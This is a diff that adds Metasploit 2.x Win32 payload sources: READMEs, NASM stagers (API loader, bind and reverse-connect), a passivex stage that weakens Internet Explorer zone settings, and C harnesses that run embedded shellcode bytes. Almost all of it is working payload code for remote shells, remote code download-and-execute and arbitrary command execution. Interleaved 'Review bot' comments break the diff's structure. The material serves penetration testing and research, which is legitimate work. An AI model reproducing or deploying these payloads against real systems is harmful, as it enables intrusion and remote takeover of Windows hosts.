diff --git a/external/source/shellcode/windows/README b/external/source/shellcode/windows/README
new file mode 100644
index 0000000000..c5e14b3a67
--- /dev/null
+++ b/external/source/shellcode/windows/README
@@ -0,0 +1,18 @@
+This directory contains the win32 payload development environment used
+for creating the payloads in version 3 of the Metasploit Framework.
+
+The 'nasm' executable must be in your path to use the included build tool.
+
+The included 'build' script automatically creates a number of file types
+each time it used to compile a payload. These file types are:
+
+ - Native ELF executable
+ - Win32 PE executable
+ - Generated C source code
+ - Raw opcodes in ".bin" format
+
+The PE executable templates were developed by 'rix' and used with permission.
+
+To use this script, simply run ./build , where the name
+does not include the ".asm" suffix. To build win32_stage_api.asm, the
+command line would be "./build win32_stage_api".
diff --git a/external/source/shellcode/windows/msf2/README b/external/source/shellcode/windows/msf2/README
new file mode 100755
index 0000000000..904de7d4fd
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/README
@@ -0,0 +1,53 @@
+This directory contains the win32 payload development environment used
+for creating the payloads in version 2.2 of the Metasploit Framework.
+
+The 'nasm' executable must be in your path to use the included build tool.
+
+The included 'build' script automatically creates a number of file types
+each time it used to compile a payload. These file types are:
+
+ - Native ELF executable
+ - Win32 PE executable
+ - Generated C source code
+ - Raw opcodes in ".bin" format
+
+The PE executable templates were developed by 'rix' and used with permission.
+
+To use this script, simply run ./build , where the name
+does not include the ".asm" suffix. To build win32_stage_api.asm, the
+command line would be "./build win32_stage_api".
+
+The Win32 payloads are somewhat modular, each component includes other
+components to create the final payload. The dependency tree for the
+reverse connect shell is:
+
+win32_stage_api.asm
+ win32_stage_boot_winsock_conn.asm
+ win32_stage_boot_reverse.asm
+ win32_stage_shell.asm
+
+
+This allows the different components to be maintained invidually, shared
+among multiple payloads, and converted into multi-stage payloads almost
+instantly. This release includes the following last-stage payloads:
+
+win32_stage_shell.asm
+ Executes cmd.exe with in/out redirected to socket, this is used by
+ the reverse connect and bind stagers.
+
+win32_stage_winexec.asm
+ This payload simply executes an arbitrary command line, it can be used to
+ accomplish things such as ftp/download/execute sequences, adding a user
+ accounts, or just signaling that the exploit was successful.
+
+win32_stage_inlineegg.asm
+ Writes GetProcAddress/LoadLibaryA address to socket, then reads and execs
+ the rest of the payload from the socket. This allows us to send InlineEgg
+ generated payloads as a last stage.
+
+win32_stage_uploadexec.asm
+ Reads a file size from socket, then opens up a hidden/system local file
+ (c:\metasploit.exe) and downloads the executable from the socket into this
+ file. Once the download is complete, it then executes this file with in/out
+ redirected to the socket. This can be extremely useful when combined with
+ a self-extracting/executing rootkit or language intepreter (perl.exe).
diff --git a/external/source/shellcode/windows/msf2/passivex.asm b/external/source/shellcode/windows/msf2/passivex.asm
new file mode 100644
index 0000000000..99103632dc
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/passivex.asm
@@ -0,0 +1,176 @@
+BITS 32
+GLOBAL _start
+
+_start:
+ cld
+ call get_find_function
+strings:
+ db "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", 0x0
+reg_values:
+ db "1004120012011001"
+url:
+ db "C:\progra~1\intern~1\iexplore -new", 0x0
+
+get_find_function:
+ call startup
+find_function:
+ pushad
+ mov ebp, [esp + 0x24]
+ mov eax, [ebp + 0x3c]
+ mov edi, [ebp + eax + 0x78]
+ add edi, ebp
+ mov ecx, [edi + 0x18]
+ mov ebx, [edi + 0x20]
+ add ebx, ebp
+find_function_loop:
+ jecxz find_function_finished
+ dec ecx
+ mov esi, [ebx + ecx * 4]
+ add esi, ebp
+ compute_hash:
+ xor eax, eax
+ cdq
+compute_hash_again:
+ lodsb
+ test al, al
+ jz compute_hash_finished
+ ror edx, 0xd
+ add edx, eax
+ jmp compute_hash_again
+compute_hash_finished:
+find_function_compare:
+ cmp edx, [esp + 0x28]
+ jnz find_function_loop
+ mov ebx, [edi + 0x24]
+ add ebx, ebp
+ mov cx, [ebx + 2 * ecx]
+ mov ebx, [edi + 0x1c]
+ add ebx, ebp
+ mov eax, [ebx + 4 * ecx]
+ add eax, ebp
+ mov [esp + 0x1c], eax
+find_function_finished:
+ popad
+ retn 8
+
+startup:
+ pop edi
+ pop ebx
+find_kernel32:
+ xor edx, edx
+ mov eax, [fs:edx+0x30]
+ test eax, eax
+ js find_kernel32_9x
+find_kernel32_nt:
+ mov eax, [eax + 0x0c]
+ mov esi, [eax + 0x1c]
+ lodsd
+ mov eax, [eax + 0x8]
+ jmp short find_kernel32_finished
+find_kernel32_9x:
+ mov eax, [eax + 0x34]
+ add eax, byte 0x7c
+ mov eax, [eax + 0x3c]
+find_kernel32_finished:
+
+ mov ebp, esp
+find_kernel32_symbols:
+ push 0x73e2d87e ; ExitProcess
+ push eax
+ push 0x16b3fe72 ; CreateProcessA
+ push eax
+ push 0xec0e4e8e ; LoadLibraryA
+ push eax
+ call edi
+ xchg eax, esi
+ call edi
+ mov [ebp], eax
+ call edi
+ mov [ebp + 0x4], eax
+
+load_advapi32:
+ push edx
+ push 0x32336970
+ push 0x61766461
+ push esp
+ call esi
+
+resolve_advapi32_symbols:
+ push 0x02922ba9
+ push eax
+ push 0x2d1c9add
+ push eax
+ call edi
+ mov [ebp + 0x8], eax
+ call edi
+ xchg eax, edi
+
+ xchg esi, ebx
+open_key:
+ push esp
+ push esi
+ push 0x80000001
+ call edi
+ pop ebx
+ add esi, byte (reg_values - strings)
+
+ push eax
+ mov edi, esp
+set_values:
+ cmp byte [esi], 'C'
+ jz initialize_structs
+ push eax
+ lodsd
+ push eax
+ mov eax, esp
+ push byte 0x4
+ push edi
+ push byte 0x4
+ push byte 0x0
+ push eax
+ push ebx
+ call [ebp + 0x8]
+ jmp set_values
+
+; This is NT specific, but it lets us execute iexplore regardless
+; of what drive it's installed on so long as it's on the same drive
+; as the WINDOWS directory, which it should always be.
+fixup_drive_letter:
+ mov cl, byte [0x7ffe0030]
+ mov byte [esi], cl
+
+initialize_structs:
+ push byte 0x54
+ pop ecx
+ sub esp, ecx
+ mov edi, esp
+ push edi
+ rep stosb
+ pop edi
+ mov byte [edi], 0x44
+ inc byte [edi + 0x2c]
+ inc byte [edi + 0x2d]
+
+; set lpDesktop to WinSta0\Default so that this works with non-interactive services
+ push 0x00746c75
+ push 0x61666544
+ push 0x5c306174
+ push 0x536e6957
+ mov [edi + 8], esp
+
+execute_process:
+ lea ebx, [edi + 0x44]
+ push ebx
+ push edi
+ push eax
+ push eax
+ push byte 0x10
+ push eax
+ push eax
+ push eax
+ push esi
+ push eax
+ call [ebp]
+
+exit_process:
+ call [ebp + 0x4]
diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read.bin b/external/source/shellcode/windows/msf2/win32_reverse_read.bin
new file mode 100644
index 0000000000..00f1106b13
Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_reverse_read.bin differ
diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read.c b/external/source/shellcode/windows/msf2/win32_reverse_read.c
new file mode 100644
index 0000000000..95aeb8b65d
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_reverse_read.c
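Review bot: passivex.asm is the only file in this set without the `; Title:` / `; Platforms:` / `; Author:` header block its siblings carry, and the three `db` lines after `strings:` are layout-coupled with no comment saying so: `reg_values` is consumed four bytes at a time by the `lodsd` in set_values, and that loop only stops when `cmp byte [esi], 'C'` runs into the first byte of `url`. A comment above `reg_values:` such as `; four 4-byte value names, read with lodsd; the loop ends at url's leading 'C'` would make the dependency explicit. The two hashes pushed in resolve_advapi32_symbols also lack the function-name comments that find_kernel32_symbols gives each of its hashes, and `0x80000001` in open_key deserves its named constant in a comment the same way.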
@@ -0,0 +1,28 @@ + +char code[] = +"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64" +"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e" +"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00" +"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60" +"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b" +"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59" +"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27" +"\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50" +"\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89" +"\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56" +"\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57" +"\xff\x55\x18\xff\xd3"; + + +int main(int argc, char **argv) +{ + int (*funct)(); + funct = (int (*)()) code; + (int)(*funct)(); +} diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read.elf b/external/source/shellcode/windows/msf2/win32_reverse_read.elf new file mode 100755 index 0000000000..1c3db3899c Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_reverse_read.elf differ diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read.exe b/external/source/shellcode/windows/msf2/win32_reverse_read.exe new file mode 100644 index 0000000000..31ef1697f1 Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_reverse_read.exe differ 
diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.bin b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.bin
new file mode 100644
index 0000000000..d47ff25908
Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.bin differ
diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.c b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.c
new file mode 100644
index 0000000000..991bb54e0d
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.c
@@ -0,0 +1,29 @@ + +char code[] = +"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64" +"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e" +"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00" +"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60" +"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b" +"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59" +"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27" +"\x54\x68\x02\x02\x00\x00\xff\x55\x28\x31\xc0\x50\x50\x50\x6a\x06" +"\x6a\x01\x6a\x17\xff\x55\x24\x89\xc7\xe8\x1c\x00\x00\x00\x17\x00" +"\xff\xff\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x1b" +"\x63\xff\xfe\x98\xbf\x36\x06\x00\x00\x00\x59\x6a\x1c\x51\x57\xff" +"\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00" +"\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff\xd3"; + + +int main(int argc, char **argv) +{ + int (*funct)(); + funct = (int (*)()) code; + (int)(*funct)(); +} diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.elf b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.elf new file mode 100755 index 0000000000..fd4f36196b Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.elf differ 
diff --git a/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.exe b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.exe
new file mode 100644
index 0000000000..a55ffc721a
Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_reverse_read_ipv6.exe differ
diff --git a/external/source/shellcode/windows/msf2/win32_stage_api.asm b/external/source/shellcode/windows/msf2/win32_stage_api.asm
new file mode 100644
index 0000000000..bea70bfe12
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_api.asm
@@ -0,0 +1,86 @@
+; Title: Win32 API Loader
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+[BITS 32]
+
+global _start
+_start:
+
+ call LKernel32Base
+
+LGetProcAddress:
+ push ebx
+ push ebp
+ push esi
+ push edi
+ mov ebp, [esp + 24]
+ mov eax, [ebp + 0x3c]
+ mov edx, [ebp + eax + 120]
+ add edx, ebp
+ mov ecx, [edx + 24]
+ mov ebx, [edx + 32]
+ add ebx, ebp
+
+LFnlp:
+ jecxz LNtfnd
+ dec ecx
+ mov esi, [ebx + ecx * 4]
+ add esi, ebp
+ xor edi, edi
+ cld
+
+LHshlp:
+ xor eax, eax
+ lodsb
+ cmp al, ah
+ je LFnd
+ ror edi, 13
+ add edi, eax
+ jmp short LHshlp
+
+LFnd:
+ cmp edi, [esp + 20]
+ jnz LFnlp
+ mov ebx, [edx + 36]
+ add ebx, ebp
+ mov cx, [ebx + 2 * ecx]
+ mov ebx, [edx + 28]
+ add ebx, ebp
+ mov eax, [ebx + 4 * ecx]
+ add eax, ebp
+ jmp short LDone
+
+LNtfnd:
+ xor eax, eax
+
+LDone:
+ pop edi
+ pop esi
+ pop ebp
+ pop ebx
+ ret 8
+
+LKernel32Base:
+ pop esi
+ push byte 0x30
+ pop ecx
+ mov ebx, [fs:ecx]
+ mov ebx, [ebx + 0x0c]
+ mov ebx, [ebx + 0x1c]
+ mov ebx, [ebx]
+ mov ebx, [ebx + 0x08]
+
+ push ebx ; kernel32.dll base
+ push 0xec0e4e8e ; LoadLibraryA
+ call esi ; GetProcAddress(kerne32.dll, LoadLibrary)
+ mov edi, eax
+
+ push ebx ; kernel32.dll base
+ push 0x91afca54 ; VirtualAlloc
+ call esi ; GetProcAddress(kerne32.dll, VirtualAlloc)
+
+ ; ebx = kernel32.dll base
+ ; esi = LGetProcAddress
+ ; edi = LoadLibraryA
+ ; eax = VirtualAlloc
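Review bot: LGetProcAddress has no header stating the contract every other file in this commit relies on: after the four pushes, `[esp + 24]` is the module base and `[esp + 20]` the ror-13 hash, the result comes back in eax (0 via LNtfnd when no export matches), `ret 8` pops both arguments, and ecx/edx are not preserved. A block comment above `LGetProcAddress:` along the lines of `; eax = LGetProcAddress(hash, base); 0 if not found; clobbers ecx, edx, flags` would cover that. The `cmp al, ah` in LHshlp only works because `xor eax, eax` zeroed ah two lines earlier, which deserves a why-comment, and the comments on both `call esi` lines misspell the module as `kerne32.dll`.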
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_bind.asm
new file mode 100644
index 0000000000..8addaeaa78
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind.asm
@@ -0,0 +1,33 @@
+; Title: Win32 Reverse Connect Payload
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_winsock_bind.asm"
+
+
+LBind:
+ xor ebx, ebx
+ push ebx
+ push ebx
+ push dword 0x11220002 ; port 8721
+ mov eax, esp
+ push byte 0x10 ; length
+ push eax
+ push edi
+ call FN_BIND
+
+LListen:
+ push ebx
+ push edi
+ call FN_LISTEN
+
+LAccept:
+ push ebx
+ push esp
+ push edi
+ call FN_ACCEPT
+ mov edi, eax
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_inlineegg.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_inlineegg.asm
new file mode 100644
index 0000000000..7ae75c6f6d
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_inlineegg.asm
@@ -0,0 +1,10 @@
+; Title: Win32 Reverse Connect Read Payload
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_bind.asm"
+%include "win32_stage_inlineegg.asm"
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.asm
new file mode 100644
index 0000000000..8722a7c654
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.asm
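Review bot: The `; Title: Win32 Reverse Connect Payload` line does not describe this file, which is the bind stager (LBind/LListen/LAccept on top of win32_stage_boot_winsock_bind.asm); the same copied header shows up in win32_stage_boot_bind_inlineegg.asm and win32_stage_boot_bind_read.asm as `Win32 Reverse Connect Read Payload`. Suggest `; Title: Win32 Bind Payload` here and matching titles in the other two. The `; port 8721` comment on `push dword 0x11220002` is right, but the address family is folded into the same constant, so `; AF_INET, port 8721 (0x2211 network order)` would read more clearly.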
@@ -0,0 +1,34 @@
+; Title: Win32 Reverse Connect Read Payload
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_bind.asm"
+
+LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
+
+ push byte 0x40
+ pop esi
+ push esi ; PAGE_EXECUTE_READWRITE=0x40
+
+ shl esi, 6 ; MEM_COMMIT=0x1000
+ push esi
+
+ shl esi, 8 ; 1MB
+ push esi
+
+ push byte 0x00 ; NULL
+ call [ebp+12]
+ mov ebx, eax
+
+
+LRecvLength: ; recv(s, buff, 4, 0)
+ push byte 0x00 ; flags
+ push 4096 ; length
+ push ebx ; buffer
+ push dword edi ; socket
+ call FN_RECV ; recv()
+ call ebx
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.bin b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.bin
new file mode 100644
index 0000000000..cab4531bce
Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.bin differ
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.c b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.c
new file mode 100644
index 0000000000..b288941939
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.c
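Review bot: `LRecvLength: ; recv(s, buff, 4, 0)` no longer matches the call under it, which pushes `4096` as the length, and the label name still suggests a length prefix that nothing here reads; the identical stale comment appears in win32_stage_boot_reverse_read.asm and win32_stage_inlineegg.asm. Suggest `LRecvLength: ; recv(s, buff, 4096, 0)` in all three. In LAllocateMemory the shift-built constants are commented per step, which is good, but `; 1MB` on `shl esi, 8` would be clearer as `; 0x1000 << 8 = 0x100000 (1MB)` since the value depends on the previous shift.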
@@ -0,0 +1,29 @@ + +char code[] = +"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64" +"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e" +"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00" +"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49" +"\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b" +"\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf" +"\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04" +"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0" +"\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53" +"\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53" +"\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56" +"\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a" +"\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18\xff\xd3"; + + +int main(int argc, char **argv) +{ + int (*funct)(); + funct = (int (*)()) code; + (int)(*funct)(); +} diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.elf b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.elf new file mode 100755 index 0000000000..57f04909f3 Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.elf differ 
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.exe b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.exe
new file mode 100644
index 0000000000..e613af04e3
Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_read.exe differ
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_bind_shell.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_shell.asm
new file mode 100644
index 0000000000..10ae1238b8
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_bind_shell.asm
@@ -0,0 +1,10 @@
+; Title: Win32 Network Shell
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_bind.asm"
+%include "win32_stage_shell.asm"
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse.asm
new file mode 100644
index 0000000000..3042142976
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse.asm
@@ -0,0 +1,37 @@
+; Title: Win32 Reverse Connect Payload
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_winsock_conn.asm"
+
+; [ebp + 0] = kernel32.dll base
+; [ebp + 4] = LGetProcAddress
+; [ebp + 8] = LoadLibraryA
+; [ebp + 12] = VirtualAlloc
+; [ebp + 24] = recv
+; [ebp + 28] = send
+; [ebp + 32] = accept
+; [ebp + 36] = bind
+; [ebp + 40] = connect
+; [ebp + 44] = WSASocketA
+; [ebp + 48] = WSAStartup
+; [ebp + 52] = Payload Length
+
+LConnect:
+ push 0x0100007f; host: 127.0.0.1
+ push 0x11220002 ; port: 8721
+ mov ecx, esp
+ push byte 0x10
+ push ecx
+ push dword edi
+ call dword FN_CONNECT
+ pop ecx ; remove port
+ pop ecx ; remove host
+
+ ; reconnect on failure
+ ; test eax, eax
+ ; jne short LConnect
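Review bot: The `[ebp + N]` table in the header of win32_stage_boot_reverse.asm does not match the include this file uses: win32_stage_boot_winsock_conn.asm defines `FN_CONNECT [ebp + 32]`, `FN_WSASOCK [ebp + 36]` and `FN_WSASTART [ebp + 40]`, whereas the comment lists accept/bind/connect/WSASocketA/WSAStartup at 32-48, a layout neither include in this commit defines. The same table is copied into win32_stage_boot_reverse_udp.asm, where `VirualAlloc` is also misspelled. Suggest replacing the entries from `; [ebp + 32]` onward with `; [ebp + 32] = connect`, `; [ebp + 36] = WSASocketA`, `; [ebp + 40] = WSAStartup`, and either removing or verifying the `; [ebp + 52] = Payload Length` entry, which nothing in the included files shown here writes.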
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_inlineegg.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_inlineegg.asm
new file mode 100644
index 0000000000..847a79b70e
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_inlineegg.asm
@@ -0,0 +1,10 @@
+; Title: Win32 Reverse Connect Read Payload
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_reverse.asm"
+%include "win32_stage_inlineegg.asm"
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.asm b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.asm
new file mode 100644
index 0000000000..3c303d8419
--- /dev/null
+++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.asm
@@ -0,0 +1,26 @@
+; Title: Win32 Reverse Connect Read Payload
+; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+; Author: hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_reverse.asm"
+
+
+LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
+ push byte 0x40 ; PAGE_EXECUTE_READWRITE
+ push dword 0x1000 ; MEM_COMMIT
+ push dword 0x100000 ; 1Mb
+ push byte 0x00 ; NULL
+ call [ebp+12]
+ mov ebx, eax
+
+LRecvLength: ; recv(s, buff, 4, 0)
+ push byte 0x00 ; flags
+ push 4096 ; length
+ push ebx ; buffer
+ push dword edi ; socket
+ call FN_RECV ; recv()
+ call ebx
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.bin b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.bin
new file mode 100644
index 0000000000..51f795b33c
Binary files /dev/null and b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.bin differ
diff --git a/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.c b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.c new file mode 100644 index 0000000000..730ce91b4d --- /dev/null +++ b/external/source/shellcode/windows/msf2/win32_stage_boot_reverse_read.c @@ -0,0 +1,28 @@ + +char code[] = +"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64" +"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e" +"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00" +"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60" +"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b" +"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59" +"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27" 